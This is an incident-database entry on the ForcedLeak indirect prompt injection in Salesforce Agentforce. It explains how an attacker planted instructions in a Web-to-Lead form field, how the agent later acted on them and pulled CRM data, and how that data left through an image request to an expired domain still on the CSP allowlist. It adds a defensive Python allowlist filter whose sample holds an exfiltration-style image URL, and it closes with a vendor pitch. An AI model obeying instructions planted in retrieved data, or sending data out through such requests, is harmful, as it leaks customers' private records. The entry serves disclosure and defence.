ForcedLeak prompt injection let attackers exfiltrate CRM data from Salesforce Agentforce
ForcedLeak is a CVSS 9.4 vulnerability chain discovered by Noma Security in Salesforce Agentforce that enabled external attackers to exfiltrate sensitive CRM data through indirect prompt injection. An attacker submitted malicious instructions via a Web-to-Lead form, which were later executed by Agentforce when an employee queried the lead data. The attack combined prompt injection, agent overreach, and a CSP misconfiguration involving an expired whitelisted domain to silently transmit stolen data.
A $5 expired domain in a CSP whitelist turned Salesforce's AI agent into a silent data pump that could not tell CRM records from attacker commands.
Key facts
- What: ForcedLeak is a CVSS 9.4 vulnerability chain discovered by Noma Security in Salesforce Agentforce that enabled external attackers to exfiltrate sensitive CRM data through indirect prompt injection.
- Incident date: Sep 25, 2025
- Who: Salesforce
- Failure mode: Prompt Injection
- AI surface: Agentic Workflow
- Severity: Catastrophic
What happened
Noma Security researcher Sasi Levi disclosed ForcedLeak on September 25, 2025, revealing a three-part vulnerability chain in Salesforce Agentforce rated CVSS 9.4. An external attacker could submit a Web-to-Lead form with a malicious prompt embedded in the Description field, and when an employee later queried that lead through Agentforce, the AI executed both the legitimate and hidden malicious instructions. The agent then queried the CRM for sensitive data and exfiltrated it by generating an HTML image request to an attacker-controlled expired domain that was whitelisted in Salesforce's Content Security Policy. Salesforce patched the vulnerability by enforcing Trusted URL allowlists for Agentforce and re-securing the expired domain after being notified on July 28, 2025.
What broke inside the model
- 01 · Trigger: The model reads retrieved or user-supplied text.
- 02 · Model step: That text carries hidden instructions.
- 03 · Control gap: Nothing separates untrusted data from trusted commands.
- 04 · Failure: The injected instruction overrides the operator's.
- 05 · Consequence: The system acts on an outsider's intent.
At the injection point, retrieved text overrides the operator's instruction.
The Agentforce LLM lacked context boundaries to distinguish between legitimate data and malicious instructions embedded in lead records, causing it to execute attacker commands as trusted operations. A Content Security Policy whitelist included an expired Salesforce domain (my-salesforce-cms.com) that could be purchased for roughly $5, creating a trusted exfiltration channel that bypassed outbound security monitoring. Input validation on the Web-to-Lead Description field (up to 42,000 characters) imposed no guardrails against prompt injection payloads.
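One way to enforce a trusted-URL allowlist on agent output before it is rendered, shown as an added example that is not Salesforce's or Noma's code. The host names, the `[image removed]` marker and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist. Exact hosts only, and only domains the operator
# still owns: a lapsed registration turns an entry into someone else's server.
TRUSTED_HOSTS = frozenset({"assets.crm.example"})

IMG_TAG = re.compile(r"<img\b[^>]*>", re.I)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
MD_IMG = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def is_trusted(url, trusted_hosts=TRUSTED_HOSTS):
    """True for same-origin relative paths and https URLs on allowlisted hosts."""
    if "\\" in url:             # browsers may read "/\host" as protocol-relative
        return False
    try:
        parts = urlsplit(url)
    except ValueError:          # malformed authority, e.g. a broken IPv6 literal
        return False
    if not parts.scheme and not parts.netloc:
        return True             # relative path, served by the rendering origin
    host = (parts.hostname or "").rstrip(".")
    return parts.scheme == "https" and host in trusted_hosts


def sanitize(agent_output, trusted_hosts=TRUSTED_HOSTS):
    """Strip image references to untrusted hosts; return (clean_text, blocked_urls)."""
    blocked = []

    def decide(match, url):
        if url is None or is_trusted(url, trusted_hosts):
            return match.group(0)
        blocked.append(url)     # keep for alerting: an outbound image to an unknown host
        return "[image removed]"

    def html_img(match):
        src = SRC_ATTR.search(match.group(0))
        return decide(match, src.group(1) if src else None)

    text = IMG_TAG.sub(html_img, agent_output)
    text = MD_IMG.sub(lambda m: decide(m, m.group(1)), text)
    return text, blocked


# Constructed sample of agent output, not taken from the incident.
SAMPLE = (
    'Lead summary. <img src="https://assets.crm.example/logo.png"> '
    '<img src="https://lapsed-domain.example/p.png?d=constructed-value"> '
    '![chart](/static/chart.png) ![x](http://lapsed-domain.example/q.png)'
)
```

The filter complements CSP rather than replacing it: both depend on every allowlisted host still being under the operator's control.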
What it cost
Sources
- Primary: ForcedLeak: AI Agent Risks Exposed in Salesforce Agentforce (noma.security)
- Press: Salesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injection (thehackernews.com)
- Press: ForcedLeak and the Future of AI Agent Security (varonis.com)
Cite this entry
AI Failure Index. "ForcedLeak prompt injection let attackers exfiltrate CRM data from Salesforce Agentforce" (FI-0178). Realm Labs. https://failureindex.ai/failures/forcedleak-prompt-injection-let-attackers (indexed Jun 4, 2026).
Data fields CC-BY 4.0, prose citation permitted. Incident ID FI-0178. Full dataset at /data.
Note from Realm Labs, the Index steward
How Realm would have caught this
- Prism
- OmniGuard
Realm inspects the model's internal state for the signature of instructions arriving through the data channel, so an injected command can be flagged and blocked inline before the model acts on it, instead of trusting a classifier that scores the input as safe.